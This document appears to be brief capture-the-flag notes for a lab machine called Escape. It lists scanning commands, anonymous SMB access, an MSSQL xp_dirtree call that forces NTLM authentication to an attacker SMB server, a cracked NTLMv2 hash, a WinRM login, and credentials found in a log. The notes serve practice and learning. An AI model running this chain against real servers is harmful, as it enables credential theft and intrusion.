❌Escape
MSSQL | NTLMv2 | Leaking Certificate |
nmap -A -Pn -T5 10.10.11.202 > escape.txt
Nmap scan report for 10.10.11.202
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsmansmbclient -N -L 10.10.11.202
smbclient -N //10.10.11.202/Public
xp_dirtree '\10.10.14.111\fg0x0'
impacket-smbserver fg0x0 . -smb2support
sql_svc::sequel:aaaaaaaaaaaaaaaa:a67d3a6c2bc61d49438f83e8cb850d79:010100000000000080be93d2de50d901c497e13ee4bcfbb30000000001001000440063004b0064004a0053005500490003001000440063004b0064004a00530055004900020010006400470049007700520064004400530004001000640047004900770052006400440053000700080080be93d2de50d90106000400020000000800300030000000000000000000000000300000f26169eb30bf0eac34d3f6ff79ec092da66f9ebba85a0e852ac070ebeec4957d0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100310031000000000000000000
cracked password: REGGIE1234ronnie ( sql_svc )
evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie
Select-String "Password" ERRORLOG.BAK
Username: Ryan.Cooper
Password: NuclearMosquito3
Last updated